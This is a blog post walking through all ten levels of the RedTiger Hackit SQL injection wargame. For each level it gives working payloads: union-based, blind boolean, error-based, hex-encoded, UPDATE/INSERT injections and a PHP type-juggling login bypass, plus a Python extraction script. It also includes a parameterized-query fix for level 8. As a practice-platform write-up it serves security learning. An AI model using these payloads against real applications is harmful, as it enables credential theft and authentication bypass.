MitAh's Blog
Redtiger Hackit Writeup

I've been grinding wechall lately.
While snooping around xr1s's GitHub I found an SQLi practice platform that is fairly basic and quick for racking up points:
RedTigers Hackit

There are only 10 levels in total; here is my writeup.


level 1

Welcome to level 1

Lets start with a simple injection.

Target: Get the login for the user Hornoxe
Hint: You really need one? omg
Tablename: level1_users

The most ordinary SQL injection; the injection point is ?cat=1.

payload:

http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users


level 2

Welcome to level 2

A simple loginbypass

Target: Login
Hint: Condition

The most basic "universal password" (an always-true condition in the password field).

payload:

username: admin
password: 1'or'1'='1


level 3

Welcome to Level 3

Target: Get the password of the user Admin.
Hint: Try to get an error. Tablename: level3_users

The challenge gives a hint: Try to get an error.

It took me a long while to realise that the GET parameter usr can be changed to usr[].

The error reveals the path to the source code; reuse its ready-made encrypt/decrypt functions, and the rest is ordinary injection.

Oddly, the same code gave me different results on Windows and on Ubuntu...

srand with the same seed produced a different pseudo-random sequence... no idea why.

payload:

// encrypt() is the challenge's own function, taken from the source file the error revealed
$sql = "' UNION SELECT 1, username, 3, 4, 5, password, 7 FROM level3_users WHERE username='Admin'#";
echo encrypt($sql);


level 4

Welcome to Level 4

Target: Get the value of the first entry in table level4_secret in column keyword
Disabled: like

Boolean-based blind injection, judged by whether the page says "Query returned 1 rows."

Fairly basic, so I'll just paste the code.

import requests

s = requests.Session()
# boolean condition injected into id: %s is the subquery, %d the position, %d the guessed ASCII value
url = 'https://redtiger.labs.overthewire.org/level4.php?id=1 AND ASCII(SUBSTR((%s),%d,1))=%d'
sql = "SELECT keyword from level4_secret"
headers = {
    'Cookie': 'level4login=there_is_no_bug'
}
finish = False
pos = 1          # character position being extracted (1-based, as SUBSTR expects)
result = []

while not finish:
    for c in range(0x20, 0x80):       # printable ASCII
        req = (url % (sql, pos, c))
        text = s.get(req, headers=headers).text
        # the page prints "Query returned N rows."; the character right after the
        # 15-char prefix "Query returned " is N, and 1 means the guess was correct
        jud = text[text.find('Query returned') + 15]
        if jud == '1':
            print(chr(c))
            result.append(chr(c))
            break
    else:
        # no candidate matched: we have run past the end of the keyword
        finish = True
    pos += 1

print(''.join(result))


level 5

Welcome to Level 5

Target: Bypass the login
Disabled: substring , substr, ( , ), mid
Hints: its not a blind, the password is md5-crypted, watch the login errors

A very ordinary one: union select a fabricated username/password pair to bypass the login check.

payload:

username: ' union select '123', md5('123')#
password: 123


level 6

Welcome to Level 6
Target: Get the first user in table level6_users with status 1

Trying id=1' produces an error, so that is the injection point.

Testing with order by gives 5 columns.

union select 1,2,3,4,5 shows nothing; the page says User not found.

Changing the second field to username successfully displays the admin account's profile card.

My guess is that the backend runs two SQL queries: it takes username from the first query's result and runs a second query with it to fetch the email.

So only the username field needs to be injected.

Note that any single quote in the statement causes an error, so use hex to bypass it.

>>> import binascii
>>> payload = "' union select 1,username,3,password,5 from level6_users where status=1#"
>>> binascii.hexlify(payload.encode())

The final payload is:

https://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,[hex_payload],3,4,5 from level6_users where status=1


level 7

Welcome to Level 7

Target: Get the name of the user who posted the news about google. Table: level7_news column: autor
Restrictions: no comments, no substr, no substring, no ascii, no mid, no like

A single quote as a first probe gives an error together with the SQL statement.

An error occured!:   
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR text.title LIKE '%'%')' at line 1

SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%'%' OR text.title LIKE '%'%')

This looks like error-based injection, but comments are filtered, so construct a payload that closes every quote and parenthesis.

payload:

') UNION SELECT UPDATEXML(1,CONCAT(0x7e,(SELECT autor FROM level7_news LIMIT 1 OFFSET 2)),0) OR ('


level 8

Welcome to Level 8

Target: Get the password of the admin.

Adding a quote to each input, only the email field produced an error, so that is the injection point.

The SQL statement is presumably:

update table set email='[email]', name='[name]', icq='[icq]', age='[age]' where id=1

We can assign password directly to email and read it from the returned value.

payload:

',email=password,name='
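An added example, not from the writeup or the challenge, showing why this payload works and what the fix looks like: it replays the guessed UPDATE against an in-memory SQLite table with a constructed schema, first with string concatenation and then with a parameterized query (table name, column names and row values here are assumptions).

```python
import sqlite3

PAYLOAD = "',email=password,name='"   # the level 8 payload from the writeup


def setup() -> sqlite3.Connection:
    """Constructed sample table modelled on the level 8 profile form (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE level8_users (id INTEGER PRIMARY KEY, name TEXT, email TEXT, "
        "icq TEXT, age INTEGER, password TEXT)"
    )
    conn.execute(
        "INSERT INTO level8_users VALUES (1, 'admin', 'admin@example.invalid', '0', 30, 's3cr3t')"
    )
    conn.commit()
    return conn


def update_profile_vulnerable(conn, email, name, icq, age):
    # String concatenation, as the writeup guesses the challenge does. The payload
    # turns SET email='...' into SET email='',email=password,name='',name='...' so the
    # password column is copied into email (the rightmost assignment per column wins).
    sql = f"UPDATE level8_users SET email='{email}', name='{name}', icq='{icq}', age='{age}' WHERE id=1"
    conn.execute(sql)
    conn.commit()


def update_profile_safe(conn, email, name, icq, age):
    # Parameterized query: the payload is stored as a literal string and cannot reshape the SET list.
    conn.execute(
        "UPDATE level8_users SET email=?, name=?, icq=?, age=? WHERE id=1",
        (email, name, icq, age),
    )
    conn.commit()


def email_of_admin(conn) -> str:
    return conn.execute("SELECT email FROM level8_users WHERE id=1").fetchone()[0]


def demo():
    """Returns (email after vulnerable update, email after safe update)."""
    conn = setup()
    update_profile_vulnerable(conn, PAYLOAD, "admin", "0", "30")
    leaked = email_of_admin(conn)          # 's3cr3t': the password leaked into a visible field
    conn = setup()
    update_profile_safe(conn, PAYLOAD, "admin", "0", "30")
    stored = email_of_admin(conn)          # the payload itself, stored harmlessly
    return leaked, stored
```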


level 9

Welcome to Level 9

Target: Get username and password of any user. Tablename: level9_users
This is not a blind injection. There is a way to get some output back:)

Whatever is submitted in the form is displayed back on the page.

The injection can therefore be built on the insert statement.

The statement is presumably:

insert into tablename(autor,title,text) values('[autor]','[title]','[text]')

A quick test shows the injection point is the text field.

Construct a payload that inserts an extra row so the wanted information is echoed back:

1'), ((select username from level9_users limit 1), (select password from level9_users limit 1),'1


level 10

Welcome to Level 10

Target: Bypass the login. Login as TheMaster

Pressing F12 reveals a hidden input whose base64 decodes to a piece of PHP serialized data.
After unserialize it is:

Array
(
    [username] => Monkey
    [password] => 0815password
)

According to the solution, just change username to TheMaster and password to true.

payload:

serialize: a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}
base64: YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=

This is a PHP loose-typing (type juggling) issue:

echo true=='admin';
//1


AK (all ten levels cleared)
